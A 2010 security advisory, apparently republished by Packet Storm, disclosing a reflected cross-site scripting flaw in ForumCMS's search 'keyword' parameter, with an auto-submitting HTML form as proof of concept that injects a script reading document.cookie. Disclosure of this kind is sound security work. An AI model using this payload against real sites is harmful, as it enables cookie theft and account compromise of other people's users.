ForumCMS 08.06.2010 Cross Site Scripting

2010-06-25T00:00:00
ID PACKETSTORM:91023
Type packetstorm
Reporter High-Tech Bridge SA
Modified 2010-06-25T00:00:00

Description

                                        
                                            `Vulnerability ID: HTB22428  
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_forumcms.html  
Product: ForumCMS  
Vendor: Forum Web Design  
Vulnerable Version: Current at 08.06.2010 and Probably Prior Versions  
Vendor Notification: 10 June 2010   
Vulnerability Type: XSS (Cross Site Scripting)  
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response  
Risk level: Medium   
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)   
  
Vulnerability Details:  
User can execute arbitrary JavaScript code within the vulnerable application.  
  
The vulnerability exists due to failure in the "search/results" script to properly sanitize user-supplied input in "keyword" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  
  
An attacker can use browser to exploit this vulnerability. The following PoC is available:  
  
  
<form action=http://host/cms/ForumCMS/page/search/results method=POST name=main>  
<input type=hidden name=keyword value="<script>alert(document.cookie)</script>" >  
</form>  
<script>  
document.main.submit();  
</script>  
  
  
`